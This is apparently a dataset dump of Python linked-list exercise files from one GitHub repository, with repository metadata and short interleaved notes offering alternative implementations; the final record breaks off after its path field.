"blob_id": "a43385002091dfd8a306c83a1340ff9df67faea4",
"content_id": "3781f6de6cba1409ffe44031f8d30e1278c18c8e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 290,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 10,
"path": "/27_lengthisEven.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef evenLength(l1):\n return (l1.length() % 2) == 0\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n print(\"Length of linkedlist is even : \",evenLength(l1))\nif __name__ == \"__main__\":\n main()"
},
{
"alpha_fraction": 0.5481651425361633,
"alphanum_fraction": 0.5779816508293152,
"avg_line_length": 23.27777862548828,
"blob_id": "93f11e5bf8b2e45c19c4aada9597aa90e2cdd029",
"content_id": "7de4ad4694ec0141d0e86a5a8f40c2142dc6d9c0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 436,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 18,
"path": "/5_is_there_circle.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedListHelper import CreateLinkedList\ndef _isCircular(l1):\n head = l1\n l1 = l1.next\n while l1!=None and l1!=head:\n l1 = l1.next\n return l1==head\ndef main():\n l1 = CreateLinkedList()\n # temp = l1.head\n # while temp.next != None:\n # temp = temp.next\n # temp.next = l1.head\n print(\"Is there any circle in linked list : \",_isCircular(l1.head))\n \n \nif __name__ == \"__main__\":\n main()"
},
{
"alpha_fraction": 0.4937500059604645,
"alphanum_fraction": 0.5406249761581421,
"avg_line_length": 21.85714340209961,
"blob_id": "8afb1d9d4b935c86991c1d160ec74c91bab5bc49",
"content_id": "e5a5504fc7ae950c928233c1bd47cefa26e500cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 640,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 28,
"path": "/42_num_mul.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef multiply(l1 , l2):\n LEN = l1.length() - 1\n num1 = 0\n head = l1.head\n while head:\n num1 = num1 + (head.val*(10 ** LEN))\n LEN -= 1\n head = head.next\n \n LEN = l2.length() - 1\n num2 = 0\n head = l2.head\n while head:\n num2 = num2 + (head.val*(10 ** LEN))\n LEN -= 1\n head = head.next\n return num1 * num2\n \ndef main():\n l1 = LinkedList()\n l2 = LinkedList()\n CreateLinkedList(l1)\n CreateLinkedList(l2)\n print(\"Mul : \",multiply(l1 , l2))\nif __name__ == \"__main__\":\n main()\n"
},
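`multiply` in `42_num_mul.py` rebuilds each operand by weighting digits with powers of ten, most-significant digit first. Horner's rule folds the same value without precomputing the length; a plain-list sketch, useful as a test oracle:

from functools import reduce

def digits_to_int(digits):
    # Horner's rule: equivalent to summing d * 10**position.
    return reduce(lambda acc, d: acc * 10 + d, digits, 0)

assert digits_to_int([3, 2, 1]) == 321
assert digits_to_int([3, 2, 1]) * digits_to_int([2, 0]) == 6420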
{
"alpha_fraction": 0.5450381636619568,
"alphanum_fraction": 0.5847328305244446,
"avg_line_length": 26.29166603088379,
"blob_id": "90af7aa8b14876659d444325adc52527c87bbc50",
"content_id": "9c455483128d1c708c558e0e043b20d7481d10eb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 655,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 24,
"path": "/24_compare_string.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef compare(head1 , head2):\n while head1 and head2:\n if head1.val == head2.val:\n head1 = head1.next\n head2 = head2.next\n elif head1.val > head2.val:\n return 1\n else:\n return -1\n if not head1 and not head2:\n return 0\n elif head1:\n return 1\n return -1\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1 , func=str)\n l2 = LinkedList()\n CreateLinkedList(l2 , func=str)\n print(\"Ans of comparision is = %d\"%compare(l1.head , l2.head))\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.44176429510116577,
"alphanum_fraction": 0.4562370777130127,
"avg_line_length": 24.017240524291992,
"blob_id": "95ebeb07760dcba593cc8fb0a616fbebfa5432e1",
"content_id": "b0bc87f3eb4f13b763ecb0ead9639e31b0a4dd36",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1451,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 58,
"path": "/1_add_1_num.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "class Node:\n def __init__(self , val = 0 , next = None):\n self.val = val\n self.next = next\nclass LinkedList:\n def __init__(self):\n self.head = None\n def inset_end(self , val = 0):\n if not self.head:\n self.head = Node(val=val)\n else:\n temp = self.head\n while temp.next:\n temp = temp.next\n temp.next = Node(val=val)\n def display(self):\n if not self.head:\n print(\"Linked list is empty!\")\n return\n temp = self.head\n print(\"Linked list is\",end=\"\")\n while temp:\n print(\" -> \"+str(temp.val),end=\"\")\n temp = temp.next\n def reverse(self):\n temp = self.head\n prev = None\n while temp:\n nxt = temp.next\n temp.next = prev\n prev = temp\n temp = nxt\n self.head = prev\n def get_num(self):\n temp = self.head\n num = 0\n i = 0\n while temp:\n num += ((10**i) * temp.val)\n temp = temp.next\n i+=1\n return num\ndef main():\n num = input(\"Enter the number : \")\n l1 = LinkedList()\n for i in num:\n l1.inset_end(int(i))\n l1.reverse()\n num = l1.get_num() + 1\n l2 = LinkedList()\n while num != 0:\n l2.inset_end(num%10)\n num //= 10\n l2.reverse()\n return l2\nif __name__ == \"__main__\":\n l = main()\n l.display()\n"
},
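`1_add_1_num.py` stores digits most-significant first, reverses so the value can be read out least-significant first, adds one, then re-emits digits. The whole pipeline is equivalent to an int round-trip, which makes a convenient oracle for testing it (a sketch, assuming non-negative decimal input):

def add_one(digits):
    # digits are most-significant first, e.g. [1, 2, 9] represents 129
    n = int("".join(map(str, digits))) + 1
    return [int(c) for c in str(n)]

assert add_one([1, 2, 9]) == [1, 3, 0]
assert add_one([9, 9]) == [1, 0, 0]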
{
"alpha_fraction": 0.49111807346343994,
"alphanum_fraction": 0.5005224943161011,
"avg_line_length": 23.564102172851562,
"blob_id": "8352734addcef05eb0d69d81e62f6cbd1109f46c",
"content_id": "3c45a4009088ee247bdb252fd4c37dbb3a342af8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 957,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 39,
"path": "/40_loop_linkedList.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\nclass modLinkedList(LinkedList):\n def display(self , l):\n temp = self.head\n if not temp:\n print(\"Linked list is empty ..\")\n return\n print(\"Linkedlist is : \",end=\"\")\n for _ in range(l+4):\n print(temp.val , end=\"->\")\n temp = temp.next\n if not temp:\n print(\"NULL\")\n return\n print(\"......\")\n \ndef createLoop(head , k):\n node = prev = None\n c = 1\n while head:\n if c == k:\n node = head\n c+=1\n prev = head\n head = head.next\n if not node:\n return\n prev.next = node\ndef main():\n l1 = modLinkedList()\n CreateLinkedList(l1)\n l = l1.length()\n l1.display(l)\n k = int(input(\"Enter the value of k : \"))\n createLoop(l1.head , k)\n l1.display(l)\nif __name__ == \"__main__\":\n main()"
},
{
"alpha_fraction": 0.547325074672699,
"alphanum_fraction": 0.5665295124053955,
"avg_line_length": 22.516128540039062,
"blob_id": "83354662f9187255c404a2f48e7b52d7b8fffd9e",
"content_id": "eff9434671b915cb0e7467920233301f60162b66",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 729,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 31,
"path": "/23_find_middle.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef find_middle(L):\n LEN = L.length()\n if LEN % 2 != 0:\n LEN = LEN - 1\n pos = LEN // 2\n head = L.head\n for _ in range(pos):\n head = head.next\n return head\n\ndef find_middle_method2(head):\n count = 0\n node = head \n while head:\n if (count & 1) == 1:\n node = node.next\n count += 1\n head = head.next\n return node\n\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n node = find_middle(l1)\n print(\"Value of middle node is : \",node.val)\n node = find_middle_method2(l1.head)\n print(\"Value of middle node is : \", node.val)\nif __name__ == \"__main__\":\n main()\n"
},
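Both middle-finders in `23_find_middle.py` make one pass; `find_middle_method2` advances a second pointer on every other step via the `count & 1` trick. The more common phrasing of the same idea is an explicit slow/fast pointer pair, sketched here with a stand-in `Node` (an assumption, since the repo's node type is not shown):

class Node:
    def __init__(self, val, nxt=None):
        self.val, self.next = val, nxt

def middle(head):
    slow = fast = head
    while fast and fast.next:  # fast takes two steps per slow step
        slow, fast = slow.next, fast.next.next
    return slow  # second of the two middles for even lengths, like find_middle

head = Node(1, Node(2, Node(3, Node(4, Node(5)))))
assert middle(head).val == 3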
{
"alpha_fraction": 0.4457477927207947,
"alphanum_fraction": 0.47214075922966003,
"avg_line_length": 23.95121955871582,
"blob_id": "ef7ed5e35066222bb135fec2f85dc8d412adde82",
"content_id": "6ca2dddc9ce0257449032ca5cf1da9a0c1de1e9e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1023,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 41,
"path": "/9_delte_linkedlist.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nclass linkedlistmod(LinkedList):\n def delete(self,val):\n if not self.head:\n return False\n elif self.head.val == val:\n temp = self.head\n self.head = self.head.next\n del temp\n self.delete(val)\n else:\n prev = self.head\n next = self.head.next\n while next:\n if next.val == val:\n prev.next = next.next\n temp = next\n del temp\n next = prev.next\n else:\n prev = next\n next = next.next\ndef main():\n l1 = linkedlistmod()\n l1.insert_end(1)\n l1.insert_end(1)\n l1.insert_end(1)\n l1.insert_end(1)\n l1.insert_end(1)\n l1.insert_end(2)\n l1.insert_end(3)\n l1.insert_end(5)\n l1.insert_end(1)\n l1.insert_end(1)\n l1.insert_end(1)\n l1.display()\n l1.delete(1)\n l1.display()\n\nif __name__ == \"__main__\":\n main()\n"
},
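The recursive head-handling in `9_delte_linkedlist.py`'s `delete` exists only because removing the head is a special case. A sentinel (dummy) head removes that case entirely; a sketch under the same assumed `Node` shape:

class Node:
    def __init__(self, val, nxt=None):
        self.val, self.next = val, nxt

def delete_all(head, val):
    dummy = Node(None, head)  # sentinel: the head is no longer special
    prev = dummy
    while prev.next:
        if prev.next.val == val:
            prev.next = prev.next.next  # unlink the match, keep prev in place
        else:
            prev = prev.next
    return dummy.next

head = Node(1, Node(1, Node(2, Node(1))))
head = delete_all(head, 1)
assert head.val == 2 and head.next is None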
{
"alpha_fraction": 0.48428836464881897,
"alphanum_fraction": 0.49722737073898315,
"avg_line_length": 23.590909957885742,
"blob_id": "801efa1523e2c31e3f53f5721e468943d87a6097",
"content_id": "18ad3a6113244deb780cb593ca65cbeac7368400",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 541,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 22,
"path": "/4_decimal_equi.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nclass ModList(LinkedList):\n def binary_equ(self):\n l = self.length() - 1\n temp = self.head\n ans = 0\n while temp:\n ans += ((2**l) * temp.val)\n temp = temp.next\n l -= 1\n return ans\n\ndef main():\n print(\"Enter the number : \",end=\"\")\n num = [int(x) for x in input().split(\" \")]\n l1 = ModList()\n for i in num:\n l1.inset_end(i)\n print(\"Binary equivalent is : \",l1.binary_equ())\n \nif __name__ == \"__main__\":\n main()\n"
},
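`binary_equ` in `4_decimal_equi.py` folds binary digits with `2**position` weights; Python's int parser computes the same value and works as a one-line oracle (sketch):

def binary_digits_to_int(bits):
    # same value binary_equ accumulates with powers of two
    return int("".join(map(str, bits)), 2)

assert binary_digits_to_int([1, 0, 1, 1]) == 11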
{
"alpha_fraction": 0.6109890341758728,
"alphanum_fraction": 0.6219780445098877,
"avg_line_length": 25.823530197143555,
"blob_id": "45b20b57a3579c2527c674d0c2af88eedddadcae",
"content_id": "8dbead54a42c3bfcba327c90632d364645cabf80",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 455,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 17,
"path": "/17_remove_linked_list.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\nclass LinkedListMod(LinkedList):\n def remove_allnode(self):\n while self.head:\n temp = self.head\n self.head = self.head.next\n del temp\ndef main():\n l1 = LinkedListMod()\n CreateLinkedList(l1)\n l1.display()\n print(\"Remove the Linked List.....\")\n l1.remove_allnode()\n l1.display()\nif __name__ == \"__main__\":\n main()"
},
{
"alpha_fraction": 0.5358744263648987,
"alphanum_fraction": 0.5493273735046387,
"avg_line_length": 22.526315689086914,
"blob_id": "6c23b3bb43a6834aa88e1f3b01ba3f72c874271d",
"content_id": "a9576e5fdb88370fb6393b337eae64466e86c6e1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 446,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 19,
"path": "/31_linked_list_modulo.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef get_ans(head , k):\n ans = None\n c = 1\n while head:\n if c % k == 0:\n ans = head\n head = head.next\n c += 1\n return ans.val\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n k = int(input(\"Enter the value of k : \"))\n ans = get_ans(l1.head , k)\n print(\"Ans : \",ans)\nif __name__ == \"__main__\":\n main()"
},
{
"alpha_fraction": 0.595652163028717,
"alphanum_fraction": 0.602173924446106,
"avg_line_length": 26.058822631835938,
"blob_id": "3f9dbdd1aa1b1e329e6da3b768823c1bc5bbea2f",
"content_id": "3fc6d9de9e1af88c830989b5d35f4909dd6a6103",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 460,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 17,
"path": "/53_alternate_rec.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef print_alternative(head , t):\n if not head:\n return\n else:\n if t:\n print(head.val , end=\" \")\n t = not t\n return print_alternative(head.next, t)\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n print(\"Linkedlist is (alternative ) : \",end=\"\")\n print_alternative(l1.head , True)\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5809312462806702,
"alphanum_fraction": 0.5942350625991821,
"avg_line_length": 20.5238094329834,
"blob_id": "9f2c0577f17e91418a298f83b8bcd80e6e78951f",
"content_id": "592d37d908d67c2cd0db0508c595f680b9f8fbe8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 451,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 21,
"path": "/22_reverse_list.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef reverse(head):\n if not head:\n return None\n prev = None\n next = None\n while head:\n next = head.next\n head.next = prev\n prev = head\n head = next\n return prev\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n l1.display()\n l1.head = reverse(l1.head)\n l1.display()\nif __name__ == \"__main__\":\n main()"
},
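The three-pointer loop in `22_reverse_list.py` is the standard O(1)-space reversal. The recursive formulation reads more declaratively at the cost of O(n) stack depth; a sketch with a stand-in `Node`:

class Node:
    def __init__(self, val, nxt=None):
        self.val, self.next = val, nxt

def reverse_rec(head, prev=None):
    if head is None:
        return prev  # prev is the new head once the walk falls off the end
    nxt = head.next
    head.next = prev  # flip one link per call
    return reverse_rec(nxt, head)

head = reverse_rec(Node(1, Node(2, Node(3))))
assert [head.val, head.next.val, head.next.next.val] == [3, 2, 1]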
{
"alpha_fraction": 0.5717488527297974,
"alphanum_fraction": 0.5896860957145691,
"avg_line_length": 22.473684310913086,
"blob_id": "f8b88c312084bff541da06054528ec0c228d1538",
"content_id": "9cfe5c1d4d2ea43872e932f209b0fd8bacc052eb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 446,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 19,
"path": "/54_reverse_word.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef rev(s):\n STR = \"\"\n for i in range(len(s)-1 , -1 , -1):\n STR += s[i]\n return STR\ndef reverse_list(head):\n while head:\n head.val = rev(head.val)\n head = head.next\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1 , func=str)\n l1.display()\n reverse_list(l1.head)\n l1.display()\nif __name__ == \"__main__\":\n main()\n"
},
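`rev` in `54_reverse_word.py` reverses each string by walking its indices backwards; slicing with a negative stride is the idiomatic one-liner with the same result (sketch):

def rev(s):
    return s[::-1]  # same output as the index-walking loop

assert rev("abc") == "cba"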
{
"alpha_fraction": 0.5511482357978821,
"alphanum_fraction": 0.5699373483657837,
"avg_line_length": 20.81818199157715,
"blob_id": "8229622378be65e56e08b273ed9d614f64199a62",
"content_id": "6b3d34007c81ac2104535f14e7c8c85adf52508e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 479,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 22,
"path": "/32_middle_delete.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef deleteMiddle(head):\n prev = None\n mid = head\n count = 0\n while head:\n if count & 1 == 1:\n prev = mid\n mid = mid.next\n head = head.next\n count += 1\n prev.next = mid.next\n del mid\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n l1.display()\n deleteMiddle(l1.head)\n l1.display()\nif __name__ == \"__main__\":\n main()"
},
{
"alpha_fraction": 0.6144278645515442,
"alphanum_fraction": 0.6293532252311707,
"avg_line_length": 24.1875,
"blob_id": "40ff8f72adea56e59a34ce43db8e161db831c49c",
"content_id": "16eca1bdad52e384f98f4273389731036323a7f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 402,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 16,
"path": "/36_count_rotate_sort.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef count_rotate(head):\n count = 0\n while head.next and head.val < head.next.val:\n count += 1\n head = head.next\n count += 1\n return count\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n count = count_rotate(l1.head)\n print(\"Count = \",count)\nif __name__ == \"__main__\":\n main()"
},
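`count_rotate` in `36_count_rotate_sort.py` returns the length of the initial ascending run; taken modulo the list length that is the index of the minimum element, i.e. the rotation count (an unrotated list maps to 0). A plain-list cross-check (sketch):

def count_rotations(vals):
    run = 1
    while run < len(vals) and vals[run - 1] < vals[run]:
        run += 1
    return run % len(vals)  # unrotated input wraps to 0

assert count_rotations([4, 5, 1, 2, 3]) == 2
assert count_rotations([1, 2, 3, 4, 5]) == 0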
{
"alpha_fraction": 0.6157894730567932,
"alphanum_fraction": 0.6263157725334167,
"avg_line_length": 24.399999618530273,
"blob_id": "1ef43f82030eec34b94e67b295dc28e1b16113bb",
"content_id": "51083d186f521d91143a3cf5755befc9a0d58336",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 380,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 15,
"path": "/15_linkedlist_reverse.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef reverse_list(head):\n if not head:\n return\n reverse_list(head.next)\n print(head.val,end=\" \")\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n if l1.head:\n print(\"Rev of linked list : \",end=\"\")\n reverse_list(l1.head)\nif __name__ == \"__main__\":\n main()"
},
{
"alpha_fraction": 0.4487534761428833,
"alphanum_fraction": 0.4598338007926941,
"avg_line_length": 23.89655113220215,
"blob_id": "fa03f2b8dee3a790068bd9b2aa526a9f0d158a57",
"content_id": "daac681bb37ca79f93206af47f43ddd8a5181fd4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 722,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 29,
"path": "/46_non_repeat.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef findNumber(head):\n h = {}\n c = 0\n while head:\n if head.val not in h:\n h[head.val] = {} \n h[head.val]['count'] = 0\n h[head.val]['pos'] = c\n c += 1\n h[head.val]['count'] += 1\n head = head.next\n ans = None\n # print(h)\n for i in h:\n if h[i]['count']==1:\n if ans==None:\n ans = i\n else:\n if h[ans]['pos']>h[i]['pos']:\n ans = i\n return ans\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n print(\"Number is : \",findNumber(l1.head))\nif __name__ == \"__main__\":\n main()\n"
},
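`findNumber` in `46_non_repeat.py` tracks both a count and a first-seen position per value. Since CPython 3.7 dicts preserve insertion order, one `Counter` pass plus a scan in input order gives the same answer with less bookkeeping (sketch):

from collections import Counter

def first_unique(vals):
    counts = Counter(vals)  # one pass to count occurrences
    for v in vals:          # first value whose count is exactly 1
        if counts[v] == 1:
            return v
    return None

assert first_unique([1, 2, 1, 3, 2]) == 3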
{
"alpha_fraction": 0.5936073064804077,
"alphanum_fraction": 0.6095890402793884,
"avg_line_length": 22.052631378173828,
"blob_id": "ae5da8aaac8cd223facf76eb3917e48932664f38",
"content_id": "6e4c3feb1daaa3b3f28ed8e2d6f74a2f359464df",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 438,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 19,
"path": "/51_delete_alternate_node.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef delete_alternative(l1):\n head = l1.head\n if not head:\n return\n while head:\n if not head.next:\n return\n head.next = head.next.next\n head = head.next\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n l1.display()\n delete_alternative(l1)\n l1.display()\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.41407033801078796,
"alphanum_fraction": 0.45929649472236633,
"avg_line_length": 22.690475463867188,
"blob_id": "676b5a82537b25268ac7216c5c87d557fc7ba203",
"content_id": "5bb7a7d6d46d8bb95ce8e918f2ab941364787dfc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 995,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 42,
"path": "/19_add_number.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef add(l1,l2):\n l1 = l1.head\n l2 = l2.head\n new_ll = LinkedList()\n carry = 0\n while l1 or l2 or carry!=0:\n if l1 and l2:\n s = l1.val+l2.val+carry\n carry = s // 10\n s = s % 10\n new_ll.insert_end(s)\n l1 = l1.next\n l2 = l2.next\n elif l1:\n s = l1.val+carry\n carry = s // 10\n s = s % 10\n new_ll.insert_end(s)\n l1 = l1.next\n elif l2:\n s = l2.val+carry\n carry = s // 10\n s = s % 10\n new_ll.insert_end(s)\n l2 = l2.next\n else:\n new_ll.insert_end(carry)\n carry = 0\n return new_ll\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n l2 = LinkedList()\n CreateLinkedList(l2)\n result = add(l1,l2)\n result.display()\n \n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5797752737998962,
"alphanum_fraction": 0.5977528095245361,
"avg_line_length": 22.421052932739258,
"blob_id": "efbdbde706a5abea2ee066d46ac3d6b3e0c44de6",
"content_id": "aa185b75c7607211cec48dfae473c728b510eb0c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 445,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 19,
"path": "/14_index_ll.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef getNth(head, k):\n count = 0\n temp = head\n while count < k-1 and temp:\n temp = temp.next\n count += 1\n if not temp:\n return -1\n return temp.val\n\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n print(\"Item : \", getNth(l1.head, int(input(\"Enter the index : \"))))\n return 0\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.4577777683734894,
"alphanum_fraction": 0.5013333559036255,
"avg_line_length": 25.785715103149414,
"blob_id": "9919145077ee181cad2633bcf7e9ac09713d9d25",
"content_id": "a7140606fc456edf7acc51fa5ab6f3cc293ec120",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1125,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 42,
"path": "/52_sort_012.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef sort_012(l1):\n pointer0 = pointer1 = pointer2 = None\n temp0 = temp1 = temp2 = None\n head = l1.head\n while head:\n if head.val==0:\n if pointer0==None:\n pointer0 = head\n temp0 = pointer0\n else:\n pointer0.next = head\n pointer0 = pointer0.next\n elif head.val == 1:\n if pointer1 == None:\n pointer1 = head\n temp1 = pointer1\n else:\n pointer1.next = head\n pointer1 = pointer1.next\n else:\n if pointer2 == None:\n pointer2 = head\n temp2 = pointer2\n else:\n pointer2.next = head\n pointer2 = pointer2.next\n head = head.next\n pointer0.next = temp1\n pointer1.next = temp2\n pointer2.next = None\n l1.head = temp0\n\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n l1.display()\n sort_012(l1)\n l1.display()\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5345528721809387,
"alphanum_fraction": 0.5508130192756653,
"avg_line_length": 22.4761905670166,
"blob_id": "9802965137cc264cd6591564049a61fe1c2dddf4",
"content_id": "ab5c22e01b46413c3d64067a138073e6d027411b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 492,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 21,
"path": "/49_sort.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef sort_ll(l1):\n head = l1.head\n while head.next:\n if head.next.val < 0:\n val = head.next.val\n head.next = head.next.next\n l1.insert_beg(val)\n temp = head.next\n del temp\n else:\n head = head.next\n\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n sort_ll(l1)\n l1.display()\nif __name__ == \"__main__\":\n main()"
},
{
"alpha_fraction": 0.6022944450378418,
"alphanum_fraction": 0.6367112994194031,
"avg_line_length": 26.578947067260742,
"blob_id": "2f4eb9eb1c6d350725366332165c5eb4ff7dadfa",
"content_id": "02bb6bdbff16ef6b38fa0625dae7bc0b6566567e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 523,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 19,
"path": "/41_identical.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef isIdentical(head1,head2):\n while head1 and head2:\n if head1.val != head2.val:\n return False\n head1 = head1.next\n head2 = head2.next\n if not head1 and not head2:\n return True\n return False\ndef main():\n l1 = LinkedList()\n l2 = LinkedList()\n CreateLinkedList(l1)\n CreateLinkedList(l2)\n print(\"Is identical : \",isIdentical(l1.head , l2.head))\nif __name__ == \"__main__\":\n main()"
},
{
"alpha_fraction": 0.5973333120346069,
"alphanum_fraction": 0.6133333444595337,
"avg_line_length": 21.117647171020508,
"blob_id": "1da92ba8bfafcddd68f1db03f126479326e12812",
"content_id": "6d818b922dab7ecd7d2c391b8c2901a9ba14ba66",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 375,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 17,
"path": "/39_delete_recursion.py",
